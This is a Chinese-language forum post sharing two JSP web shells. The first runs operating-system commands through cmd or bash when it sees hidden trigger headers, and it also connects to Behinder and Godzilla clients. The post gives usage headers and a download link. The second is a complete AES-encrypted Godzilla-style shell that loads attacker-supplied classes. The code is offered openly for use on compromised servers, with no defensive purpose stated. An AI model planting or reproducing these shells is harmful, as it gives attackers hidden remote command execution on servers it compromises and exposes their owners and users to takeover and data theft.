分享两个jsp马

h88z · 发表于 2022-4-19 15:03:47

本帖最后由 h88z 于 2022-4-19 03:04 PM 编辑

最近摸鱼的时候发现了两个jsp马挺有意思的

第一种三合一马集合了冰蝎和哥斯拉

if (request.getHeader("Referer").equalsIgnoreCase("https://www.google.com/")) {
                    if (request.getHeader("x-client-data").equalsIgnoreCase("cmd")) {
                        String cmd = request.getHeader("cmd");
                        if (cmd != null && !cmd.isEmpty()) {
                            String[] cmds = null;
                            if (System.getProperty("os.name").toLowerCase().contains("win")) {
                                cmds = new String[]{"cmd", "/c", cmd};
                            } else {
                                cmds = new String[]{"/bin/bash", "-c", cmd};

else if (request.getHeader("x-client-data").equalsIgnoreCase("rebeyond")) {
                        if (request.getMethod().equals("POST")) {
                            HashMap pageContext = new HashMap();
                            HttpSession session = request.getSession();
                            pageContext.put("request", request);
                            pageContext.put("response", response);
                            pageContext.put("session", session);
                            String payload = request.getReader().readLine();
                            String k = "e45e329feb5d925b"; 
                            session.putValue("u", k);

else if (request.getHeader("x-client-data").equalsIgnoreCase("godzilla")) {

                        byte[] data = base64Decode(request.getParameter(pass));
                        data = x(data, false);
                        if (payload == null) {

这种即能web执行又能连接冰蝎和哥斯拉食用的时候更改相应的header即可 Referer: https://www.google.com/ x-client-data: cmd cmd: ls

下载地址：https://wwi.lanzoup.com/iZcu403g34zc

第二种

<%! String xc="1ba05fbdac836a48"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}
%>

这种像二开的哥斯拉有大佬会的带带弟弟

上一篇：Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现(附EXP)
下一篇：ThinkPHP日志分析工具